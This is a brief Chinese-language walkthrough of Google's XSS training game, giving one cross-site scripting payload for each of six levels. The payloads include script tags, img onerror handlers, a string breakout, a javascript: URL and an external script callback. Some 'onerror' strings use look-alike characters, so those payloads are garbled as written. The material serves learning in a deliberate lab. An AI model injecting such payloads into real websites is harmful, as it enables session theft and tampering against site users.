Ref:https://xss-game.appspot.com/
Dat:20140724
Google说你若能从他们的重要产品中找到一个危险的XSS会得到$7,500,这个Game是为了提高学习XSS的兴趣。
【Level 01:Hello,world of XSS】
无过滤
<script>alert(1)</script>
【Level 02:Persistence is key】
标签变更
<img src=1 οnerrοr=alert(1)>
【Level 03:That sinking feeling...】
img标签的onerror事件
'οnerrοr=alert(1) >
【Level 04:Context matters】
img标签的onload事件
')||alert('1
【Level 05:Breaking protocol】
href标签
https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert(1)
点击Next>>
【Level 06:Follow the rabbit】
script标签的src属性
%20https://www.google.com/jsapi?callback=alert
//或者自己搭建一个https的可以访问的js脚本
//或者支持https外链的云盘